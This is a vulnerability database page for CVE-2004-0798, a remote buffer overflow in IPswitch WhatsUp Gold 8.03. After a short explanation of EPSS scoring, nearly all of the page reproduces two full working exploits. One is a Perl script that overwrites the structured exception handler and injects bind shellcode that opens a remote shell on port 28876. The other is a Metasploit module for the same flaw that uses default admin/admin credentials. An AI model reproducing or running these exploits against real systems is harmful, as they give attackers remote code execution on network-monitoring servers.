CVE-2004-0798 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/perl # [LoWNOISE] NotmuchG.pl v.1.5 # ================================================ # IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit # ================================================ # # Exploit by ET LoWNOISE Colombia # et(at)cyberspace.org # Oct/2004 # # Tested on WIN2K SP4 # # The exploit takes control by overwriting the pointer of a Structured Exception Handler, # installed by WhatsUP and points to a routine that handles exceptions. # (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny Cyberpunk THC) # # The overflow string has to be around 4080 in length to generate an exception that can # be manipulated by changing the SEH pointer (ret [815]). # # # Bug Discovered by # iDEFENSE Security Advisory 08.25.04 # http://www.idefense.com/application/poi/display?type=vulnerabilities # # Greetz to the midget, the m3 and los parces , the seltiks, p0ch1n, Ritt3r,Mav, f4lc0n.. use strict; use IO::Socket::INET; usage() unless (@ARGV == 2); my $host = shift(@ARGV); my $port = shift(@ARGV); # Bind shellcode port 28876 (HDM, metasploit.org) my $shellcode = "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52". "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1". "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a". "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01". "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b". "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32". "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff". "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe". "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50". "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff". "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89". "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff". "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a". "\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb". "\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0". "\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44". "\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b". "\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff". "\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff". "\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0". "\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff"; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to the host.\n"; $socket->autoflush(1); print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n"; print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, application/vnd.citrix.AdvGWClient-2_2, */*\r\n"; print $socket "Referer: http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n"; print $socket "Accept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n"; print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461; .NET CLR 1.1.4322)\r\n"; print $socket "Host: 127.0.0.1\r\nContent-Length: "; my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename="; #[-------815-------------] [ret] [-------------4080---------] #[A.....811...A][jmp] [ret] [nops][shc][E.......E ] $cmd .= "A"x811; #815 -4 $cmd .= "\xeb\x06\x90\x90"; #jumper <eb + 06> <garbage> jmp to shellcode #$cmd .= "\xfe\x63\xa1\x71"; #winXP SP1 ws2help.dll $cmd .= "\xc4\x2a\x02\x75"; #win2k sp0-sp4 ws2help.dll #$cmd .= "LOWNOISE"; #garbage :D $cmd .= "\x90"x2080; $cmd .= $shellcode; $cmd .= "E"x(2000-length($shellcode)); #mas basura $cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end"; print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n"; print $socket $cmd."\r\n"; close($socket); exit(0); sub usage { print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n"; print "===================================================\n"; print "\nUsage: NotmuchG.pl [host] [port]\n"; print "[host] Target host\n[port] WhatsUp webserver port\n\n"; print "\n Shell on tcp port 28876.\n\n"; print "ET LoWNOISE 2004\n"; exit(1); } # milw0rm.com [2004-10-04]

## # $Id: ipswitch_wug_maincfgret.rb 9820 2010-07-14 13:59:38Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" ) HttpFingerprint = { :pattern => [ /WhatsUp/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By posting a long string for the value of 'instancename' in the _maincfgret.cgi script an attacker can overflow a buffer and execute arbitrary code on the system. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9820 $', 'References' => [ ['CVE', '2004-0798'], ['OSVDB', '9177'], ['BID', '11043'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => [ [ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 25 2004')) register_options( [ Opt::RPORT(80), OptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']), OptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']), ], self.class ) end def exploit c = connect num = rand(65535).to_s user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}" req = "page=notify&origname=&action=return&type=Beeper&instancename=" req << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06" req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end" print_status("Trying target %s..." % target.name) res = send_request_cgi({ 'uri' => '/_maincfgret.cgi', 'method' => 'POST', 'content-type' => 'application/x-www-form-urlencoded', 'data' => req, 'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}" } }, 5) handler end end